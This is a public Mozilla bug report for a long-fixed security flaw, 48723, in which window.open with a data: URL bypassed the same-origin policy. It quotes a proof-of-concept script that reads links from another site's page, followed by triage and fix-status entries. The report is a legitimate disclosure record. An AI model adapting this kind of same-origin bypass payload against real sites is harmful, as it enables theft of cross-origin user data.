Closed Bug 48723 Opened 24 years ago Closed 24 years ago

Principal not updated when window is reassigned with window.open

Categories

(Core :: Security, defect, P3)

VERIFIED FIXED

People

(Reporter: security-bugs, Assigned: security-bugs)

Details

(Whiteboard: [nsbeta3+])

This is similar to 47670 but I've fixed that one and this one is not resolved.

From: Georgi Guninski <joro@nat.bg>
To: Mitchell Stoltz <mstoltz@netscape.com>

The data: protocol allows circumventing same origin security policy using window.open()

The code is:
----------------------------------------------------
<SCRIPT>
a=window.open("http://www.yahoo.com","a");
function f()
{
window.open("data:text/html;,data2<SCRIPT>b=window.open('http://www.yahoo.com');msg='The first links is: ';setTimeout('alert(msg+b.document.links[0].href)',3000)</"+"SCRIPT>","a");
}
setTimeout("f()",3000);
</SCRIPT>
----------------------------------------------------

As with 47670, we need to assign the correct principal to the window when its content is changed using window.open("new url","target"). This works for a data: URL because it's inheriting its principal; only the referrer is wrong: it should be the script principal rather than the previous page loaded in that window.
nsbeta3 for exploit.
Status: NEW → ASSIGNED
Keywords: nsbeta3
m18.
Target Milestone: --- → M18
Marking nsbeta3+.
Whiteboard: [nsbeta3+]
Fix checked in.
Really this time.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
Verified fixed.
Status: RESOLVED → VERIFIED
Opening fixed security bugs to the public.
Group: netscapeconfidential?